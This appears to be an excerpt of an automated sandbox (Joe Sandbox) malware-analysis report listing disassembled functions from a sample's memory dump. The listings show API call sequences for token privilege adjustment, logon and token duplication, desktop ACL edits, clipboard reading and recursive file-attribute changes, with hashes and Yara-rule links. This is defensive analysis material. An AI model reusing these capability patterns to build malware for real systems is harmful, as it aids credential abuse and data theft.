                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5b4b0943f8bcb8e7ed58ef3dfaa51c2dd62082c81500e5ff339b9731ef43f96d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 15b89ca148f4aee728662a5b6571b02d66beef50277717a095282cf86960f10a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b4b0943f8bcb8e7ed58ef3dfaa51c2dd62082c81500e5ff339b9731ef43f96d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63B0922800460009AD2C2A385A1A99A33007942BA97DC2BC0E47DA52F1D339880FBA50
                                                                                                                                                                                                                                                                                                    Function 00E9664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DC54: FindFirstFileW.KERNEL32(?,?), ref: 00E8DCCB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00E8DD1B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E8DD2C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DC54: FindClose.KERNEL32(00000000), ref: 00E8DD43
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E9666E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9dbb0cda6f97296c32d421c97bb9840922d492f17dd3e0ff847c29ee2416218d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 03f4beb3b560bb31309a5931ba1c294c66e8417fbb6772879b562e3a7a7613ed
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9dbb0cda6f97296c32d421c97bb9840922d492f17dd3e0ff847c29ee2416218d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F0A0362042208FCB10EF59E945B6EB7E5FF88720F048419F949AB352CB70BC01CB91

                                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                                    Function 00E81B4D Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8205A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E82087
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: GetLastError.KERNEL32 ref: 00E82097
                                                                                                                                                                                                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E81BD2
                                                                                                                                                                                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E81BF4
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E81C05
                                                                                                                                                                                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E81C1D
                                                                                                                                                                                                                                                                                                    • GetProcessWindowStation.USER32 ref: 00E81C36
                                                                                                                                                                                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00E81C40
                                                                                                                                                                                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E81C5C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E81B48), ref: 00E81A20
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A0B: CloseHandle.KERNEL32(?,?,00E81B48), ref: 00E81A35
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                                    • String ID: $default$winsta0$j
                                                                                                                                                                                                                                                                                                    • API String ID: 22674027-2615587742
                                                                                                                                                                                                                                                                                                    • Opcode ID: d6491a0047b2e0f70616e83f167f19d80a2940542abb1fc36e404897a741f614
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e2b150299ce1df562c325ca92daaca5546af23e4e1c3627bc3c4624f029f478
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6491a0047b2e0f70616e83f167f19d80a2940542abb1fc36e404897a741f614
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2817971904209AFDF11AFA5DC49FEE7BBCEF04309F1451A9F918B61A0E731894ACB60
                                                                                                                                                                                                                                                                                                    Function 00E814AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E81A60
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A6C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A82
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E81A99
                                                                                                                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E81518
                                                                                                                                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E8154C
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00E81563
                                                                                                                                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00E8159D
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E815B9
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00E815D0
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E815D8
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00E815DF
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E81600
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00E81607
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E81636
                                                                                                                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E81658
                                                                                                                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E8166A
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E81691
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E81698
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E816A1
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E816A8
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E816B1
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E816B8
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00E816C4
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E816CB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: GetProcessHeap.KERNEL32(00000008,00E814FD,?,00000000,?,00E814FD,?), ref: 00E81AED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E814FD,?), ref: 00E81AF4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E814FD,?), ref: 00E81B03
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7cb4646169158c2e302f45c0f3178833eede5a04fb58160c30f664ff9d454aa8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5637a002bb4719b32ef47821f9ec3229c2786e6e4483d53e6bfdc3099e313029
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cb4646169158c2e302f45c0f3178833eede5a04fb58160c30f664ff9d454aa8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39715BB290420AAFDF10EFA5DC44FAEBBBDBF04354F084655E959B6190E7319906CBA0
                                                                                                                                                                                                                                                                                                    Function 00E9F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00EBDCD0), ref: 00E9F586
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E9F594
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00E9F5A0
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00E9F5AC
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00E9F5E4
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00E9F5EE
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00E9F619
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00E9F626
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 00E9F62E
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00E9F63F
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00E9F67F
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00E9F695
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00E9F6A1
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00E9F6B2
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00E9F6D4
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E9F6F1
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E9F72F
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00E9F750
                                                                                                                                                                                                                                                                                                    • CountClipboardFormats.USER32 ref: 00E9F771
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00E9F7B6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f1244bd83701c63ed43b17d555a49ea44b6c497dfdffcd227bbf4d04015bd8e0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4a2d90cb41bd55d5f2102046264931109a04237deaa90b4ed00b0305b6240ad9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1244bd83701c63ed43b17d555a49ea44b6c497dfdffcd227bbf4d04015bd8e0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE619035208201AFD700EF25EC85F6AB7E4AF44708F14556DF456E72A2DB31ED49CB61
                                                                                                                                                                                                                                                                                                    Function 00E973D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E97403
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E97457
                                                                                                                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E97493
                                                                                                                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E974BA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E974F7
                                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E97524
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8c46092592e5cc59246f4cb5bec85fa8bdec2eb6b80740f6f560ae351607b460
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0eb49c1c72fbd74adc37a036b722a0456c80b57801811c6101da8f6f83d6448a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c46092592e5cc59246f4cb5bec85fa8bdec2eb6b80740f6f560ae351607b460
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAD19272508354AFC710EB64D845EAFB7ECAF88704F40191DF589E6292EB74DA48C762
                                                                                                                                                                                                                                                                                                    Function 00E9A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E9A0A8
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00E9A0E6
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00E9A100
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00E9A118
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A123
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00E9A13F
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E9A18F
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00EE7B94), ref: 00E9A1AD
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E9A1B7
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A1C4
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A1D4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: aa309117222c36471ccfabbbaf65be79ebd03c4a1aed05d951f4de67c7951ab6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 66edecede945583a7fdc2091ae7bb3b6b414351f7679481ae4568f1c0ab6e3aa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa309117222c36471ccfabbbaf65be79ebd03c4a1aed05d951f4de67c7951ab6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B831047260525E6FDF14AFB6EC49ADF77AC9F04324F081161E814F20A0EB74DE458AA1
                                                                                                                                                                                                                                                                                                    Function 00E94763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E94785
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E947B2
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E947E2
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E94803
                                                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00E94813
                                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E9489A
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E948A5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E948B0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                    • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6f6f4afcfc8ed55bd76a14f882113da0e3b0c9446743478da83f48f4e7afee95
                                                                                                                                                                                                                                                                                                    • Instruction ID: 08b7cccf5196cc8dc56e541bc596814661c670a1b3e74796f4a225722bbc4a1b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f6f4afcfc8ed55bd76a14f882113da0e3b0c9446743478da83f48f4e7afee95
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 633190B190424AABDF219BA1DC49FEB37BCEF89744F1051B6F609F20A0E77096458B24
                                                                                                                                                                                                                                                                                                    Function 00E9A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E9A203
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00E9A25E
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A269
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00E9A285
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E9A2D5
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00EE7B94), ref: 00E9A2F3
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E9A2FD
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A30A
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A31A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E8E3B4
                                                                                                                                                                                                                                                                                                    Strings
